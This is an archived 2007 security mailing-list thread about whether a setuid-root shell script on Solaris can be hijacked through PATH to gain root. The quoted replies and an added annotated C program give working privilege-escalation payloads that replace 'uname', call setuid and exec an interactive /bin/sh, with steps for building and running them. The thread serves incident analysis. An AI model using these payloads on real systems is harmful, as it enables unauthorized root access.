Re: solaris root-setuid script to gain root?

From: Nathan Sportsman (nsportsman@gmail.com)
Date: Sun Jul 01 2007 - 13:38:26 EDT


Just to be clear... the owner of your uname program is root and the
setuid bit is set on it, right? chmod u+s uname

try doing setuid(geteuid()) and see what effective user id the program
is actually being run as.

Thanks
Nathan Sportsman

On 7/1/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> On 7/1/07, Thomas Pollet <thomas.pollet@gmail.com> wrote:
> > Hello,
> >
> > On 30/06/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> > > Hi
> > >
> > > I was doing pen testing the other day and I found one root suid script
> > > left by some of the web developers:
> > >
> > > -rwsr-x--x 1 root users /home/web/c.cgi
> > >
> > > which is basically a bash script:
> > >
> > > ------ cut ------------
> > > #!/bin/sh
> > >
> > > uname
> > > ------ cut ------------
> > >
> > > And our system was recently compromised. Some local user was able to
> > > gain root access. Could this script be the way of gaining root access?
> > >
> > > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> > > "Because it was not possible to write a secure suid shell script, the concept
> > > of suid shell scripts was removed from Unix." But then it says "Solaris now
> > > supports suid shell" !
> > > I tried modifying the PATH variable and creating my own "uname" program.
> > > But my uname program runs with local user privs instead of root. I
> > > also tried the
> > did you put a setuid(0) in your uname program?
> >
> > f.i.:
> > cat >uname.c<<EOF
> > #include <unistd.h>
> > /* Runs in place of uname when the caller's PATH puts this binary first.
> >    setuid(0)/setgid(0) only succeed if the setuid script already passed
> >    euid 0 along; otherwise both return -1 and the shell below is unprivileged. */
> > int main (int argc, char **argv, char **envp) {
> > setuid(0);
> > setgid(0);
> > execve("/bin/sh",argv,envp);
> > return 1;   /* only reached if execve fails */
> > }
> > EOF
> >
> > > other attack described in the link above: "link to -i" but this didn't
> > > work as well.
> > > So could this script be the problem?
> > >
> > > P.S: The machine runs SunOS 5.6 with all updates
> >
> > Regards,
> > Thomas Pollet
> >
>
> Yes, my uname program was exactly the same. But I used the execl call instead
> of execve (I don't think that would make any difference). I also tried
> setting the euid
> (seteuid(0)).
> Using a bash script for the "uname" program didn't work either:
>
> % cat uname
> #!/bin/sh
> touch /tmp/test
> chown root /tmp/test
>
> the script complains about privileges and can't execute chown.
>
>
>
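The replacement "uname" that Nathan's check calls for, as an added example that is not code from anyone in the thread. The earlier test programs called setuid(0) and ignored its return value, so a failure told them nothing; this version records the real and effective ids the kernel actually gave the process (to a file, since the script's stdout may never be shown), then does setuid(geteuid()) so that getuid() reports whatever privilege was really inherited, and only execs a shell if that turns out to be 0. The log path /tmp/uname-ids.log and the fallback to /usr/bin/uname are assumptions for this example; whether Solaris 2.6 passes euid 0 to the commands inside a set-id #! script is exactly what the thread is trying to establish, and the program simply reports what it received.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Where to leave the evidence: an assumption for this example. The setuid
   script's stdout goes wherever c.cgi's does, so do not rely on seeing it. */
#define ID_LOG "/tmp/uname-ids.log"

/* Render the four credentials the kernel gave this process. If the
   setuid-root script really hands root to the commands it runs, euid
   is 0 here while uid is still the calling user's. */
int format_ids(char *buf, size_t len)
{
    return snprintf(buf, len, "uid=%ld euid=%ld gid=%ld egid=%ld",
                    (long)getuid(), (long)geteuid(),
                    (long)getgid(), (long)getegid());
}

/* Nathan's suggestion: copy the effective ids over the real ones.
   setuid(0) can only succeed when euid is already 0, so a silent failure
   proves nothing; setuid(geteuid()) always succeeds for the process's own
   effective id, and afterwards getuid() reports the privilege actually
   held. Returns the real uid after the change. */
uid_t adopt_effective_ids(void)
{
    setgid(getegid());   /* gid first, while euid may still be 0 */
    setuid(geteuid());
    return getuid();
}

int main(int argc, char **argv)
{
    char ids[128];
    FILE *log;

    (void)argc;
    format_ids(ids, sizeof ids);
    log = fopen(ID_LOG, "a");
    if (log != NULL) {
        fprintf(log, "%s argv0=%s\n", ids, argv[0]);
        fclose(log);
    }

    if (adopt_effective_ids() == 0) {
        /* Root was inherited through the script: drop into a shell. */
        execl("/bin/sh", "sh", "-i", (char *)NULL);
        return 1;        /* only reached if execl fails */
    }

    /* No privilege: say so, then behave like the real uname so the
       script's own output is unchanged (path is an assumption). */
    fprintf(stderr, "uname hijack ran without root: %s\n", ids);
    execl("/usr/bin/uname", "uname", (char *)NULL);
    return 1;
}
```

Build it as uname, put its directory first in PATH, run c.cgi, and read /tmp/uname-ids.log: a line with euid=0 means the script does pass root on and the shell should have appeared; euid equal to uid means the interpreter was started without the script's privileges and no amount of setuid(0) in the payload will change that.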

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Swap Out your SPI or Watchfire app sec solution for
Cenzic's robust, accurate risk assessment and management
solution FREE - limited Time Offer

http://www.cenzic.com/wf-spi
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:55 EDT